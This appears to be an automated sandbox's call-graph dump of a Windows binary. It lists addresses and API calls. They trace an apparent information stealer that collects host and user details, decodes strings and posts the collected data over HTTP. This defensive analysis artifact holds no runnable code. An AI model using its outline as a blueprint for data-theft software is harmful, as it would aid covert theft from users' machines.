53334->53335 54493 40212d 53335->54493 53338 40f9e1 lstrcpy 53340 414381 53338->53340 53339 413d0a StrCmpCA 53341 414316 53339->53341 53339->53383 54496 402286 lstrcpy 53340->54496 53342 40f9e1 lstrcpy 53341->53342 53343 414325 53342->53343 54491 40217b lstrcpy 53343->54491 53347 41432e 53351 40f9e1 lstrcpy 53347->53351 53348 414396 53349 40f9e1 lstrcpy 53348->53349 53353 4143a4 53349->53353 53350 413eb7 StrCmpCA 53354 4142d1 53350->53354 53350->53383 53352 41433c 53351->53352 54492 4022a0 lstrcpy 53352->54492 54497 4132d9 lstrcpy _EH_prolog 53353->54497 53355 40f9e1 lstrcpy 53354->53355 53357 4142e0 53355->53357 53356 40217b lstrcpy 53356->53383 54489 4021c9 lstrcpy 53357->54489 53361 402147 lstrcpy 53361->53383 53363 4142e9 53364 40f9e1 lstrcpy 53363->53364 53366 4142f7 53364->53366 53365 414064 StrCmpCA 53367 41428f 53365->53367 53365->53383 54490 4022ba lstrcpy 53366->54490 53369 40f9e1 lstrcpy 53367->53369 53368 40f9e1 lstrcpy 53370 41426f 53368->53370 53371 41429e 53369->53371 54486 4132d9 lstrcpy _EH_prolog 53370->54486 54487 402217 lstrcpy 53371->54487 53372 413c89 StrCmpCA 53372->53383 53375 402195 lstrcpy 53375->53383 53378 4142a7 53380 40f9e1 lstrcpy 53378->53380 53379 41420b StrCmpCA 53381 414226 53379->53381 53382 414216 Sleep 53379->53382 53384 4142b5 53380->53384 53386 40f9e1 lstrcpy 53381->53386 53382->53383 53383->53327 53383->53329 53383->53330 53383->53331 53383->53333 53383->53339 53383->53350 53383->53356 53383->53361 53383->53365 53383->53372 53383->53375 53383->53379 53385 402217 lstrcpy 53383->53385 53387 413118 33 API calls 53383->53387 53390 413e36 StrCmpCA 53383->53390 53391 40f9e1 lstrcpy 53383->53391 53392 4021e3 lstrcpy 53383->53392 53397 4021c9 lstrcpy 53383->53397 53398 41303a 28 API calls 53383->53398 53406 413fe3 StrCmpCA 53383->53406 53407 402231 lstrcpy 53383->53407 53409 4010b1 _EH_prolog lstrcpy 53383->53409 53410 414190 StrCmpCA 53383->53410 53411 402265 lstrcpy 53383->53411 54475 402113 53383->54475 54480 402161 lstrcpy 53383->54480 54481 4021af lstrcpy 53383->54481 54482 4021fd lstrcpy 53383->54482 54483 40224b lstrcpy 53383->54483 54488 4022d4 lstrcpy 53384->54488 53385->53383 53389 414235 53386->53389 53387->53383 53388 41428a 53400 413295 _EH_prolog 53388->53400 54484 402265 lstrcpy 53389->54484 53390->53383 53391->53383 53392->53383 53396 41423e 53401 40f9e1 lstrcpy 53396->53401 53397->53383 53398->53383 53399 414261 53399->53368 53402 41441b 53400->53402 53403 41424c 53401->53403 54478 401061 _EH_prolog 53402->54478 54485 4022ee lstrcpy 53403->54485 53405 414427 53412 4136b3 53405->53412 53406->53383 53407->53383 53409->53383 53410->53383 53411->53383 53413 40f9e1 lstrcpy 53412->53413 53414 4136c3 53413->53414 53415 40f9e1 lstrcpy 53414->53415 53416 4136cf 53415->53416 53417 40f9e1 lstrcpy 53416->53417 53418 4136db 53417->53418 53419 413295 _EH_prolog 53418->53419 53420 4132b5 53419->53420 53420->52520 53422 40f971 53421->53422 53423 40f986 53422->53423 53424 40f97e lstrcpy 53422->53424 53423->52527 53424->53423 53425->52537 53427 410516 GetVolumeInformationA 53426->53427 53428 41050f 53426->53428 53429 410546 53427->53429 53428->53427 53430 410578 GetProcessHeap HeapAlloc 53429->53430 53431 41059b wsprintfA lstrcat 53430->53431 53432 41058d 53430->53432 54498 4104a2 GetCurrentHwProfileA 53431->54498 53434 40f923 lstrcpy 53432->53434 53436 410596 53434->53436 53435 4105cb 53437 4105da lstrlenA 53435->53437 53436->52544 53438 4105ee 53437->53438 54502 411154 lstrcpy malloc strncpy 53438->54502 53440 4105f8 53441 410606 lstrcat 53440->53441 53442 410619 53441->53442 53443 40f923 lstrcpy 53442->53443 53444 41062a 53443->53444 53444->53436 53446 40f95a lstrcpy 53445->53446 53447 403b25 53446->53447 54503 403a54 _EH_prolog 53447->54503 53449 403b31 53450 40f923 lstrcpy 53449->53450 53451 403b4e 53450->53451 53452 40f923 lstrcpy 53451->53452 53453 403b61 53452->53453 53454 40f923 lstrcpy 53453->53454 53455 403b72 53454->53455 53456 40f923 lstrcpy 53455->53456 53457 403b83 53456->53457 53458 40f923 lstrcpy 53457->53458 53459 403b94 53458->53459 53460 403ba4 InternetOpenA StrCmpCA 53459->53460 53461 403bc6 53460->53461 53462 404122 InternetCloseHandle 53461->53462 53463 410b5c 3 API calls 53461->53463 53476 404136 53462->53476 53464 403bdc 53463->53464 53465 40fa28 3 API calls 53464->53465 53466 403bef 53465->53466 53467 40f9e1 lstrcpy 53466->53467 53468 403bfc 53467->53468 53469 40fa9c 4 API calls 53468->53469 53470 403c25 53469->53470 53471 40f9e1 lstrcpy 53470->53471 53472 403c32 53471->53472 53473 40fa9c 4 API calls 53472->53473 53474 403c4f 53473->53474 53475 40f9e1 lstrcpy 53474->53475 53477 403c5c 53475->53477 53476->52547 53478 40fa28 3 API calls 53477->53478 53479 403c78 53478->53479 53480 40f9e1 lstrcpy 53479->53480 53481 403c85 53480->53481 53482 40fa9c 4 API calls 53481->53482 53483 403ca2 53482->53483 53484 40f9e1 lstrcpy 53483->53484 53485 403caf 53484->53485 53486 40fa9c 4 API calls 53485->53486 53487 403ccc 53486->53487 53488 40f9e1 lstrcpy 53487->53488 53489 403cd9 53488->53489 53490 40fa9c 4 API calls 53489->53490 53491 403cf7 53490->53491 53492 40fa28 3 API calls 53491->53492 53493 403d0a 53492->53493 53494 40f9e1 lstrcpy 53493->53494 53495 403d17 53494->53495 53496 403d2f InternetConnectA 53495->53496 53496->53462 53497 403d55 HttpOpenRequestA 53496->53497 53498 404119 InternetCloseHandle 53497->53498 53499 403d8e 53497->53499 53498->53462 53500 403d92 InternetSetOptionA 53499->53500 53501 403da8 53499->53501 53500->53501 53502 40fa9c 4 API calls 53501->53502 53503 403db9 53502->53503 53504 40f9e1 lstrcpy 53503->53504 53505 403dc6 53504->53505 53506 40fa28 3 API calls 53505->53506 53507 403de2 53506->53507 53508 40f9e1 lstrcpy 53507->53508 53509 403def 53508->53509 53510 40fa9c 4 API calls 53509->53510 53511 403e0c 53510->53511 53512 40f9e1 lstrcpy 53511->53512 53513 403e19 53512->53513 53514 40fa9c 4 API calls 53513->53514 53515 403e37 53514->53515 53516 40f9e1 lstrcpy 53515->53516 53517 403e44 53516->53517 53518 40fa9c 4 API calls 53517->53518 53519 403e61 53518->53519 53520 40f9e1 lstrcpy 53519->53520 53521 403e6e 53520->53521 53522 40fa9c 4 API calls 53521->53522 53523 403e8b 53522->53523 53524 40f9e1 lstrcpy 53523->53524 53525 403e98 53524->53525 53526 40fa28 3 API calls 53525->53526 53527 403eb4 53526->53527 53528 40f9e1 lstrcpy 53527->53528 53529 403ec1 53528->53529 53530 40fa9c 4 API calls 53529->53530 53531 403ede 53530->53531 53532 40f9e1 lstrcpy 53531->53532 53533 403eeb 53532->53533 53534 40fa9c 4 API calls 53533->53534 53535 403f08 53534->53535 53536 40f9e1 lstrcpy 53535->53536 53537 403f15 53536->53537 53538 40fa28 3 API calls 53537->53538 53539 403f31 53538->53539 53540 40f9e1 lstrcpy 53539->53540 53541 403f3e 53540->53541 53542 40fa9c 4 API calls 53541->53542 53543 403f5b 53542->53543 53544 40f9e1 lstrcpy 53543->53544 53545 403f68 53544->53545 53546 40fa9c 4 API calls 53545->53546 53547 403f86 53546->53547 53548 40f9e1 lstrcpy 53547->53548 53549 403f93 53548->53549 53550 40fa9c 4 API calls 53549->53550 53551 403fb0 53550->53551 53552 40f9e1 lstrcpy 53551->53552 53553 403fbd 53552->53553 53554 40fa9c 4 API calls 53553->53554 53555 403fda 53554->53555 53556 40f9e1 lstrcpy 53555->53556 53557 403fe7 53556->53557 53558 40fa28 3 API calls 53557->53558 53559 404003 53558->53559 53560 40f9e1 lstrcpy 53559->53560 53561 404010 53560->53561 53562 40f923 lstrcpy 53561->53562 53563 404029 53562->53563 53564 40fa28 3 API calls 53563->53564 53565 40403d 53564->53565 53566 40fa28 3 API calls 53565->53566 53567 404050 53566->53567 53568 40f9e1 lstrcpy 53567->53568 53569 40405d 53568->53569 53570 40407d lstrlenA 53569->53570 53571 40408d 53570->53571 53572 404096 lstrlenA 53571->53572 54511 40fb4d 53572->54511 53574 4040a6 HttpSendRequestA 53575 4040ef InternetReadFile 53574->53575 53576 404106 InternetCloseHandle 53575->53576 53579 4040b5 53575->53579 54512 40f98e 53576->54512 53578 40fa9c 4 API calls 53578->53579 53579->53575 53579->53576 53579->53578 53580 40f9e1 lstrcpy 53579->53580 53580->53579 54516 40fb4d 53581->54516 53583 411cfe StrCmpCA 53584 411d10 53583->53584 53585 411d09 ExitProcess 53583->53585 53586 411d20 strtok_s 53584->53586 53587 411e6d 53586->53587 53600 411d31 53586->53600 53587->52549 53588 411e52 strtok_s 53588->53587 53588->53600 53589 411d81 StrCmpCA 53589->53588 53589->53600 53590 411df1 StrCmpCA 53590->53588 53590->53600 53591 411d65 StrCmpCA 53591->53588 53591->53600 53592 411dc7 StrCmpCA 53592->53588 53592->53600 53593 411e06 StrCmpCA 53593->53588 53594 411d49 StrCmpCA 53594->53588 53594->53600 53595 411d9d StrCmpCA 53595->53588 53595->53600 53596 411ddc StrCmpCA 53596->53588 53596->53600 53597 411e1c StrCmpCA 53597->53588 53598 411e3e StrCmpCA 53598->53588 53599 40f997 2 API calls 53599->53600 53600->53588 53600->53589 53600->53590 53600->53591 53600->53592 53600->53593 53600->53594 53600->53595 53600->53596 53600->53597 53600->53598 53600->53599 53602 40f95a lstrcpy 53601->53602 53603 40517c 53602->53603 53604 403a54 6 API calls 53603->53604 53605 405188 53604->53605 53606 40f923 lstrcpy 53605->53606 53607 4051a5 53606->53607 53608 40f923 lstrcpy 53607->53608 53609 4051b8 53608->53609 53610 40f923 lstrcpy 53609->53610 53611 4051c9 53610->53611 53612 40f923 lstrcpy 53611->53612 53613 4051da 53612->53613 53614 40f923 lstrcpy 53613->53614 53615 4051eb 53614->53615 53616 4051fb InternetOpenA StrCmpCA 53615->53616 53617 40521d 53616->53617 53618 4058d8 InternetCloseHandle 53617->53618 53620 410b5c 3 API calls 53617->53620 53619 4058f3 53618->53619 54523 406242 CryptStringToBinaryA 53619->54523 53621 405233 53620->53621 53623 40fa28 3 API calls 53621->53623 53625 405246 53623->53625 53626 40f9e1 lstrcpy 53625->53626 53631 405253 53626->53631 53627 40f997 2 API calls 53628 40590c 53627->53628 53629 40fa9c 4 API calls 53628->53629 53630 40591a 53629->53630 53632 40f9e1 lstrcpy 53630->53632 53633 40fa9c 4 API calls 53631->53633 53638 405926 53632->53638 53634 40527c 53633->53634 53635 40f9e1 lstrcpy 53634->53635 53636 405289 53635->53636 53637 40fa9c 4 API calls 53636->53637 53639 4052a6 53637->53639 53640 401061 _EH_prolog 53638->53640 53641 40f9e1 lstrcpy 53639->53641 53642 405984 53640->53642 53643 4052b3 53641->53643 53642->52555 53644 40fa28 3 API calls 53643->53644 53645 4052cf 53644->53645 53646 40f9e1 lstrcpy 53645->53646 53647 4052dc 53646->53647 53648 40fa9c 4 API calls 53647->53648 53649 4052f9 53648->53649 53650 40f9e1 lstrcpy 53649->53650 53651 405306 53650->53651 53652 40fa9c 4 API calls 53651->53652 53653 405323 53652->53653 53654 40f9e1 lstrcpy 53653->53654 53655 405330 53654->53655 53656 40fa9c 4 API calls 53655->53656 53657 40534e 53656->53657 53658 40fa28 3 API calls 53657->53658 53659 405361 53658->53659 53660 40f9e1 lstrcpy 53659->53660 53661 40536e 53660->53661 53662 405386 InternetConnectA 53661->53662 53662->53618 53663 4053ac HttpOpenRequestA 53662->53663 53664 4053e3 53663->53664 53665 4058cf InternetCloseHandle 53663->53665 53666 4053e7 InternetSetOptionA 53664->53666 53667 4053fd 53664->53667 53665->53618 53666->53667 53668 40fa9c 4 API calls 53667->53668 53669 40540e 53668->53669 53670 40f9e1 lstrcpy 53669->53670 53671 40541b 53670->53671 53672 40fa28 3 API calls 53671->53672 53673 405437 53672->53673 53674 40f9e1 lstrcpy 53673->53674 53675 405444 53674->53675 53676 40fa9c 4 API calls 53675->53676 53677 405461 53676->53677 53678 40f9e1 lstrcpy 53677->53678 53679 40546e 53678->53679 53680 40fa9c 4 API calls 53679->53680 53681 40548c 53680->53681 53682 40f9e1 lstrcpy 53681->53682 53683 405499 53682->53683 53684 40fa9c 4 API calls 53683->53684 53685 4054b7 53684->53685 53686 40f9e1 lstrcpy 53685->53686 53687 4054c4 53686->53687 53688 40fa9c 4 API calls 53687->53688 53689 4054e1 53688->53689 53690 40f9e1 lstrcpy 53689->53690 53691 4054ee 53690->53691 53692 40fa28 3 API calls 53691->53692 53693 40550a 53692->53693 53694 40f9e1 lstrcpy 53693->53694 53695 405517 53694->53695 53696 40fa9c 4 API calls 53695->53696 53697 405534 53696->53697 53698 40f9e1 lstrcpy 53697->53698 53699 405541 53698->53699 53700 40fa9c 4 API calls 53699->53700 53701 40555e 53700->53701 53702 40f9e1 lstrcpy 53701->53702 53703 40556b 53702->53703 53704 40fa28 3 API calls 53703->53704 53705 405587 53704->53705 53706 40f9e1 lstrcpy 53705->53706 53707 405594 53706->53707 53708 40fa9c 4 API calls 53707->53708 53709 4055b1 53708->53709 53710 40f9e1 lstrcpy 53709->53710 53711 4055be 53710->53711 53712 40fa9c 4 API calls 53711->53712 53713 4055dc 53712->53713 53714 40f9e1 lstrcpy 53713->53714 53715 4055e9 53714->53715 53716 40fa9c 4 API calls 53715->53716 53717 405606 53716->53717 53718 40f9e1 lstrcpy 53717->53718 53719 405613 53718->53719 53720 40fa9c 4 API calls 53719->53720 53721 405630 53720->53721 53722 40f9e1 lstrcpy 53721->53722 53723 40563d 53722->53723 53724 40fa9c 4 API calls 53723->53724 53725 40565b 53724->53725 53726 40f9e1 lstrcpy 53725->53726 53727 405668 53726->53727 53728 40fa9c 4 API calls 53727->53728 53729 405685 53728->53729 53730 40f9e1 lstrcpy 53729->53730 53731 405692 53730->53731 53732 40fa9c 4 API calls 53731->53732 53733 4056af 53732->53733 53734 40f9e1 lstrcpy 53733->53734 53735 4056bc 53734->53735 53736 40fa28 3 API calls 53735->53736 53737 4056d8 53736->53737 53738 40f9e1 lstrcpy 53737->53738 53739 4056e5 53738->53739 53740 40fa9c 4 API calls 53739->53740 53741 405702 53740->53741 53742 40f9e1 lstrcpy 53741->53742 53743 40570f 53742->53743 53744 40fa9c 4 API calls 53743->53744 53745 40572d 53744->53745 53746 40f9e1 lstrcpy 53745->53746 53747 40573a 53746->53747 53748 40fa9c 4 API calls 53747->53748 53749 405757 53748->53749 53750 40f9e1 lstrcpy 53749->53750 53751 405764 53750->53751 53752 40fa9c 4 API calls 53751->53752 53753 405781 53752->53753 53754 40f9e1 lstrcpy 53753->53754 53755 40578e 53754->53755 53756 40fa28 3 API calls 53755->53756 53757 4057aa 53756->53757 53758 40f9e1 lstrcpy 53757->53758 53759 4057b7 53758->53759 53760 4057cb lstrlenA 53759->53760 54517 40fb4d 53760->54517 53762 4057dc lstrlenA GetProcessHeap HeapAlloc 54518 40fb4d 53762->54518 53764 4057fe lstrlenA 54519 40fb4d 53764->54519 53766 40580e memcpy 54520 40fb4d 53766->54520 53768 405820 lstrlenA 53769 405830 53768->53769 53770 405839 lstrlenA memcpy 53769->53770 54521 40fb4d 53770->54521 53772 405855 lstrlenA 54522 40fb4d 53772->54522 53774 405865 HttpSendRequestA 53775 4058b1 InternetReadFile 53774->53775 53776 4058c8 InternetCloseHandle 53775->53776 53778 405877 53775->53778 53776->53665 53777 40fa9c 4 API calls 53777->53778 53778->53775 53778->53776 53778->53777 53779 40f9e1 lstrcpy 53778->53779 53779->53778 54528 40fb4d 53780->54528 53782 411740 strtok_s 53783 4117a9 53782->53783 53784 41174d 53782->53784 53783->52557 53785 411792 strtok_s 53784->53785 53786 40f997 2 API calls 53784->53786 53787 40f997 2 API calls 53784->53787 53785->53783 53785->53784 53786->53785 53787->53784 54529 40fb4d 53788->54529 53790 41151d strtok_s 53791 41162e 53790->53791 53792 41152e 53790->53792 53791->52565 53793 4115df StrCmpCA 53792->53793 53794 40f997 2 API calls 53792->53794 53795 411611 strtok_s 53792->53795 53796 4115ae StrCmpCA 53792->53796 53797 411589 StrCmpCA 53792->53797 53798 41155b StrCmpCA 53792->53798 53793->53792 53794->53795 53795->53791 53795->53792 53796->53792 53797->53792 53798->53792 54530 40fb4d 53799->54530 53801 411674 strtok_s 53802 411681 53801->53802 53803 4116fa 53801->53803 53804 4116ab StrCmpCA 53802->53804 53805 40f997 2 API calls 53802->53805 53806 4116e3 strtok_s 53802->53806 53807 40f997 2 API calls 53802->53807 53803->52573 53804->53802 53805->53806 53806->53802 53806->53803 53807->53802 53809 40f923 lstrcpy 53808->53809 53810 414625 53809->53810 53811 40fa9c 4 API calls 53810->53811 53812 41463a 53811->53812 53813 40f9e1 lstrcpy 53812->53813 53814 414647 53813->53814 53815 40fa9c 4 API calls 53814->53815 53816 414665 53815->53816 53817 40f9e1 lstrcpy 53816->53817 53818 414672 53817->53818 53819 40fa9c 4 API calls 53818->53819 53820 41468f 53819->53820 53821 40f9e1 lstrcpy 53820->53821 53822 41469c 53821->53822 53823 40fa9c 4 API calls 53822->53823 53824 4146b9 53823->53824 53825 40f9e1 lstrcpy 53824->53825 53826 4146c6 53825->53826 53827 40fa9c 4 API calls 53826->53827 53828 4146e3 53827->53828 53829 40f9e1 lstrcpy 53828->53829 53830 4146f0 53829->53830 54531 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 53830->54531 53832 414701 53833 40fa9c 4 API calls 53832->53833 53834 41470e 53833->53834 53835 40f9e1 lstrcpy 53834->53835 53836 41471b 53835->53836 53837 40fa9c 4 API calls 53836->53837 53838 414738 53837->53838 53839 40f9e1 lstrcpy 53838->53839 53840 414745 53839->53840 53841 40fa9c 4 API calls 53840->53841 53842 414762 53841->53842 53843 40f9e1 lstrcpy 53842->53843 53844 41476f 53843->53844 54532 410415 memset RegOpenKeyExA 53844->54532 53846 414780 53847 40fa9c 4 API calls 53846->53847 53848 41478d 53847->53848 53849 40f9e1 lstrcpy 53848->53849 53850 41479a 53849->53850 53851 40fa9c 4 API calls 53850->53851 53852 4147b7 53851->53852 53853 40f9e1 lstrcpy 53852->53853 53854 4147c4 53853->53854 53855 40fa9c 4 API calls 53854->53855 53856 4147e1 53855->53856 53857 40f9e1 lstrcpy 53856->53857 53858 4147ee 53857->53858 53859 4104a2 2 API calls 53858->53859 53860 414803 53859->53860 53861 40fa28 3 API calls 53860->53861 53862 414815 53861->53862 53863 40f9e1 lstrcpy 53862->53863 53864 414822 53863->53864 53865 40fa9c 4 API calls 53864->53865 53866 41484b 53865->53866 53867 40f9e1 lstrcpy 53866->53867 53868 414858 53867->53868 53869 40fa9c 4 API calls 53868->53869 53870 414875 53869->53870 53871 40f9e1 lstrcpy 53870->53871 53872 414882 53871->53872 53873 4104dd 13 API calls 53872->53873 53874 414897 53873->53874 53875 40fa28 3 API calls 53874->53875 53876 4148a9 53875->53876 53877 40f9e1 lstrcpy 53876->53877 53878 4148b6 53877->53878 53879 40fa9c 4 API calls 53878->53879 53880 4148df 53879->53880 53881 40f9e1 lstrcpy 53880->53881 53882 4148ec 53881->53882 53883 40fa9c 4 API calls 53882->53883 53884 414909 53883->53884 53885 40f9e1 lstrcpy 53884->53885 53886 414916 53885->53886 53887 414922 GetCurrentProcessId 53886->53887 54535 411001 OpenProcess 53887->54535 53890 40fa28 3 API calls 53891 414945 53890->53891 53892 40f9e1 lstrcpy 53891->53892 53893 414952 53892->53893 53894 40fa9c 4 API calls 53893->53894 53895 41497b 53894->53895 53896 40f9e1 lstrcpy 53895->53896 53897 414988 53896->53897 53898 40fa9c 4 API calls 53897->53898 53899 4149a5 53898->53899 53900 40f9e1 lstrcpy 53899->53900 53901 4149b2 53900->53901 53902 40fa9c 4 API calls 53901->53902 53903 4149cf 53902->53903 53904 40f9e1 lstrcpy 53903->53904 53905 4149dc 53904->53905 53906 40fa9c 4 API calls 53905->53906 53907 4149f9 53906->53907 53908 40f9e1 lstrcpy 53907->53908 53909 414a06 53908->53909 54540 41064b GetProcessHeap HeapAlloc 53909->54540 53912 40fa9c 4 API calls 53913 414a24 53912->53913 53914 40f9e1 lstrcpy 53913->53914 53915 414a31 53914->53915 53916 40fa9c 4 API calls 53915->53916 53917 414a4e 53916->53917 53918 40f9e1 lstrcpy 53917->53918 53919 414a5b 53918->53919 53920 40fa9c 4 API calls 53919->53920 53921 414a78 53920->53921 53922 40f9e1 lstrcpy 53921->53922 53923 414a85 53922->53923 54547 41077c _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 53923->54547 53926 40fa28 3 API calls 53927 414aac 53926->53927 53928 40f9e1 lstrcpy 53927->53928 53929 414ab9 53928->53929 53930 40fa9c 4 API calls 53929->53930 53931 414ae2 53930->53931 53932 40f9e1 lstrcpy 53931->53932 53933 414aef 53932->53933 53934 40fa9c 4 API calls 53933->53934 53935 414b0c 53934->53935 53936 40f9e1 lstrcpy 53935->53936 53937 414b19 53936->53937 54560 410925 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 53937->54560 53940 40fa28 3 API calls 53941 414b40 53940->53941 53942 40f9e1 lstrcpy 53941->53942 53943 414b4d 53942->53943 53944 40fa9c 4 API calls 53943->53944 53945 414b76 53944->53945 53946 40f9e1 lstrcpy 53945->53946 53947 414b83 53946->53947 53948 40fa9c 4 API calls 53947->53948 53949 414ba0 53948->53949 53950 40f9e1 lstrcpy 53949->53950 53951 414bad 53950->53951 54573 40fbfd GetProcessHeap HeapAlloc GetComputerNameA 53951->54573 53954 40fa9c 4 API calls 53955 414bcb 53954->53955 53956 40f9e1 lstrcpy 53955->53956 53957 414bd8 53956->53957 53958 40fa9c 4 API calls 53957->53958 53959 414bf5 53958->53959 53960 40f9e1 lstrcpy 53959->53960 53961 414c02 53960->53961 53962 40fa9c 4 API calls 53961->53962 53963 414c1f 53962->53963 53964 40f9e1 lstrcpy 53963->53964 53965 414c2c 53964->53965 54575 40fbcb GetProcessHeap HeapAlloc GetUserNameA 53965->54575 53967 414c3d 53968 40fa9c 4 API calls 53967->53968 53969 414c4a 53968->53969 53970 40f9e1 lstrcpy 53969->53970 53971 414c57 53970->53971 53972 40fa9c 4 API calls 53971->53972 53973 414c74 53972->53973 53974 40f9e1 lstrcpy 53973->53974 53975 414c81 53974->53975 53976 40fa9c 4 API calls 53975->53976 53977 414c9e 53976->53977 53978 40f9e1 lstrcpy 53977->53978 53979 414cab 53978->53979 54576 4103a0 7 API calls 53979->54576 53982 40fa28 3 API calls 53983 414cd2 53982->53983 53984 40f9e1 lstrcpy 53983->53984 53985 414cdf 53984->53985 53986 40fa9c 4 API calls 53985->53986 53987 414d08 53986->53987 53988 40f9e1 lstrcpy 53987->53988 53989 414d15 53988->53989 53990 40fa9c 4 API calls 53989->53990 53991 414d32 53990->53991 53992 40f9e1 lstrcpy 53991->53992 53993 414d3f 53992->53993 54579 40fce5 _EH_prolog 53993->54579 53996 40fa28 3 API calls 53997 414d69 53996->53997 53998 40f9e1 lstrcpy 53997->53998 53999 414d76 53998->53999 54000 40fa9c 4 API calls 53999->54000 54001 414da5 54000->54001 54002 40f9e1 lstrcpy 54001->54002 54003 414db2 54002->54003 54004 40fa9c 4 API calls 54003->54004 54005 414dd5 54004->54005 54006 40f9e1 lstrcpy 54005->54006 54007 414de2 54006->54007 54589 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 54007->54589 54009 414df6 54010 40fa9c 4 API calls 54009->54010 54011 414e06 54010->54011 54012 40f9e1 lstrcpy 54011->54012 54013 414e13 54012->54013 54014 40fa9c 4 API calls 54013->54014 54015 414e36 54014->54015 54016 40f9e1 lstrcpy 54015->54016 54017 414e43 54016->54017 54018 40fa9c 4 API calls 54017->54018 54019 414e63 54018->54019 54020 40f9e1 lstrcpy 54019->54020 54021 414e70 54020->54021 54590 40fc92 GetProcessHeap HeapAlloc GetTimeZoneInformation 54021->54590 54024 40fa9c 4 API calls 54025 414e8e 54024->54025 54026 40f9e1 lstrcpy 54025->54026 54027 414e9b 54026->54027 54028 40fa9c 4 API calls 54027->54028 54029 414ebb 54028->54029 54030 40f9e1 lstrcpy 54029->54030 54031 414ec8 54030->54031 54032 40fa9c 4 API calls 54031->54032 54033 414eeb 54032->54033 54034 40f9e1 lstrcpy 54033->54034 54035 414ef8 54034->54035 54036 40fa9c 4 API calls 54035->54036 54037 414f1b 54036->54037 54038 40f9e1 lstrcpy 54037->54038 54039 414f28 54038->54039 54593 40fe18 GetProcessHeap HeapAlloc RegOpenKeyExA 54039->54593 54041 414f3c 54042 40fa9c 4 API calls 54041->54042 54043 414f4c 54042->54043 54044 40f9e1 lstrcpy 54043->54044 54045 414f59 54044->54045 54046 40fa9c 4 API calls 54045->54046 54047 414f7c 54046->54047 54048 40f9e1 lstrcpy 54047->54048 54049 414f89 54048->54049 54050 40fa9c 4 API calls 54049->54050 54051 414fa9 54050->54051 54052 40f9e1 lstrcpy 54051->54052 54053 414fb6 54052->54053 54596 40feb4 54053->54596 54056 40fa9c 4 API calls 54057 414fd4 54056->54057 54058 40f9e1 lstrcpy 54057->54058 54059 414fe1 54058->54059 54060 40fa9c 4 API calls 54059->54060 54061 415001 54060->54061 54062 40f9e1 lstrcpy 54061->54062 54063 41500e 54062->54063 54064 40fa9c 4 API calls 54063->54064 54065 41502e 54064->54065 54066 40f9e1 lstrcpy 54065->54066 54067 41503b 54066->54067 54611 40fe81 GetSystemInfo wsprintfA 54067->54611 54069 41504c 54070 40fa9c 4 API calls 54069->54070 54071 415059 54070->54071 54072 40f9e1 lstrcpy 54071->54072 54073 415066 54072->54073 54074 40fa9c 4 API calls 54073->54074 54075 415086 54074->54075 54076 40f9e1 lstrcpy 54075->54076 54077 415093 54076->54077 54078 40fa9c 4 API calls 54077->54078 54079 4150b3 54078->54079 54080 40f9e1 lstrcpy 54079->54080 54081 4150c0 54080->54081 54612 40ff81 GetProcessHeap HeapAlloc 54081->54612 54083 4150d1 54084 40fa9c 4 API calls 54083->54084 54085 4150de 54084->54085 54086 40f9e1 lstrcpy 54085->54086 54087 4150eb 54086->54087 54088 40fa9c 4 API calls 54087->54088 54089 41510b 54088->54089 54090 40f9e1 lstrcpy 54089->54090 54091 415118 54090->54091 54092 40fa9c 4 API calls 54091->54092 54093 41513b 54092->54093 54094 40f9e1 lstrcpy 54093->54094 54095 415148 54094->54095 54617 40ffea _EH_prolog 54095->54617 54098 40fa28 3 API calls 54099 415178 54098->54099 54100 40f9e1 lstrcpy 54099->54100 54101 415185 54100->54101 54102 40fa9c 4 API calls 54101->54102 54103 4151b7 54102->54103 54104 40f9e1 lstrcpy 54103->54104 54105 4151c4 54104->54105 54106 40fa9c 4 API calls 54105->54106 54107 4151e7 54106->54107 54108 40f9e1 lstrcpy 54107->54108 54109 4151f4 54108->54109 54623 4102c3 _EH_prolog 54109->54623 54111 41520f 54112 40fa28 3 API calls 54111->54112 54113 415224 54112->54113 54114 40f9e1 lstrcpy 54113->54114 54115 415231 54114->54115 54116 40fa9c 4 API calls 54115->54116 54117 415263 54116->54117 54118 40f9e1 lstrcpy 54117->54118 54119 415270 54118->54119 54120 40fa9c 4 API calls 54119->54120 54121 415293 54120->54121 54122 40f9e1 lstrcpy 54121->54122 54123 4152a0 54122->54123 54631 410071 _EH_prolog 54123->54631 54125 4152bd 54126 40fa28 3 API calls 54125->54126 54127 4152d3 54126->54127 54128 40f9e1 lstrcpy 54127->54128 54129 4152e0 54128->54129 54130 410071 18 API calls 54129->54130 54131 41530c 54130->54131 54132 40fa28 3 API calls 54131->54132 54133 41531f 54132->54133 54134 40f9e1 lstrcpy 54133->54134 54135 41532c 54134->54135 54136 40fa9c 4 API calls 54135->54136 54137 415358 54136->54137 54138 40f9e1 lstrcpy 54137->54138 54139 415365 54138->54139 54140 415379 lstrlenA 54139->54140 54141 415389 54140->54141 54142 40f923 lstrcpy 54141->54142 54143 41539f 54142->54143 54144 4010b1 2 API calls 54143->54144 54145 4153b7 54144->54145 54650 414437 _EH_prolog 54145->54650 54147 4153c4 54148 401061 _EH_prolog 54147->54148 54149 4153ea 54148->54149 54149->52578 54151 40f95a lstrcpy 54150->54151 54152 4041dd 54151->54152 54153 403a54 6 API calls 54152->54153 54154 4041e9 GetProcessHeap RtlAllocateHeap 54153->54154 54921 40fb4d 54154->54921 54156 404223 InternetOpenA StrCmpCA 54157 404242 54156->54157 54158 404378 InternetCloseHandle 54157->54158 54159 40424d InternetConnectA 54157->54159 54162 4042e9 54158->54162 54160 40426d HttpOpenRequestA 54159->54160 54161 40436f InternetCloseHandle 54159->54161 54163 4042a2 54160->54163 54164 404368 InternetCloseHandle 54160->54164 54161->54158 54162->52583 54165 4042a6 InternetSetOptionA 54163->54165 54166 4042bc HttpSendRequestA HttpQueryInfoA 54163->54166 54164->54161 54165->54166 54166->54162 54168 40430c 54166->54168 54167 404326 InternetReadFile 54167->54164 54167->54168 54168->54162 54168->54164 54168->54167 54922 4060db 54169->54922 54171 40ef5b 54172 4010b1 2 API calls 54171->54172 54173 40ef6c 54172->54173 55161 40e7b8 9 API calls 54173->55161 54175 40ed50 StrCmpCA 54202 40ed28 54175->54202 54177 4010b1 2 API calls 54179 40ef7f 54177->54179 54178 40edc4 StrCmpCA 54178->54202 55208 40bbe8 _EH_prolog 54179->55208 54181 40f923 lstrcpy 54181->54202 54182 40eee0 StrCmpCA 54182->54202 54185 40fa9c _EH_prolog lstrlenA lstrcpy 